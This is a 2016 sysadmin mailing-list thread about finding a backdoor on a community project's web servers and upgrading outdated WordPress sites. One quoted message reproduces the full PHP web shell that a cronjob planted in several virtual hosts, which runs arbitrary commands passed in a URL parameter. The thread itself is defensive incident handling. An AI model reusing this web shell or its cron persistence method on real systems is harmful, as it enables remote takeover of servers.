[Systems] Found a backdoor

Bernie Innocenti bernie at codewiz.org
Tue Mar 1 19:57:33 EST 2016


+walter

Can we appoint an official maintainer for walterbender.org? Sorry for
not stepping up myself, but I'm overwhelmed by work related things and
trying to reduce my sysadmin load.

On 03/01/2016 02:50 PM, Samuel Cantero wrote:
> On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org
> <mailto:bernie at codewiz.org>> wrote:
> 
>     On 02/25/2016 04:09 AM, Sebastian Silva wrote:
>     > Remember in June we had an incident with a broken Wordpress site.
>     > I switched to static generator since then.
>     >
>     > +1 on containers just learning more about them and finding them fascinating.
>     > Count me in on containerizing everything.
>     >
>     > I'm not aware of other wordpress sites. Maybe walter's blog?
>     > Wordpress is a PIA IMHO.
> 
>     Yes, WP is riddled with security holes. Back in October, Samuel helped
>     Walter upgrade walterbender.org <http://walterbender.org> on
>     sunjammer. Samuel, can you confirm
>     that the WP instance now fully patched and locked down?
> 
> 
> The WP version on walterbender.org <http://walterbender.org> site is
> 4.3.1. The WP last version is 4.4.2. I have checked the WP change log
> and we can find this:
> 
> 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site
> scripting vulnerability that could allow a site to be compromised.
> 
> 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
> security issues: a possible SSRF for certain local URIs, and an open
> redirection attack.
> 
> This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7.
> Significant information on the release notes:
> 
>   * Pre-emptive security improvements to ensure that the Akismet plugin
>     can't be used by attackers to compromise a WordPress installation.
>   * Closes a potential XSS vulnerability.
> 
> Of course, every version has a lot of bug fixes. We definitely should
> upgrade it and test nothing breaks walterbender.org
> <http://walterbender.org> site.
> 
> Who is in charge of upgrading the others WP sites?
> 
> Regards,
> 
> Samuel C.
>  
> 
> 
> 
>     > Regards,
>     > Sebastian
>     >
>     >
>     > On 25/02/16 04:47, Bernie Innocenti wrote:
>     >> While I was looking for cronjobs in /var/spool/cron/crontabs/, i
>     found
>     >> that www-data was executing commands like these:
>     >>
>     >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==
>     >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
>     >> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
>     >>
>     >> Did you spot the system()? This executes arbitrary commands specified
>     >> via the "localtime" url parameter. Uh-oh.
>     >>
>     >> There were about a dozen lines like the above, installing
>     .cache.php in
>     >> various virtualhosts. I kept a copy of the file in
>     >> /root/www-data.backdoor. The file was last written on Jun 23  2015,
>     >> which may correlate with the switch to the new website.
>     >>
>     >> I cleared the mess and searched the logs for requests containing
>     >> "localtime", but couldn't find any. I wonder if they could filter the
>     >> logs, since they were previously writable by www-data.
>     >>
>     >> Please watch out. We should ensure directories accessible over
>     http are
>     >> not writable by user www-data, especially those in which PHP and CGIs
>     >> are enabled.
>     >>
>     >> Running several large sites under the same uid has always been a bad
>     >> security practice, and looking forward we should keep migrating
>     them to
>     >> properly isolated containers.
>     >>
>     >> Finally, Wordpress is particularly dangerous and we should update and
>     >> harden all instances. Can someone please take care of this? I'll do
>     >> Mediawiki, which I know pretty well.
>     >>
>     >
> 
> 
>     --
>      _ // Bernie Innocenti
>      \X/  http://codewiz.org
>     _______________________________________________
>     Systems mailing list
>     Systems at lists.sugarlabs.org <mailto:Systems at lists.sugarlabs.org>
>     http://lists.sugarlabs.org/listinfo/systems
> 
> 
> 
> 
> _______________________________________________
> Systems mailing list
> Systems at lists.sugarlabs.org
> http://lists.sugarlabs.org/listinfo/systems
> 


-- 
 _ // Bernie Innocenti
 \X/  http://codewiz.org


More information about the Systems mailing list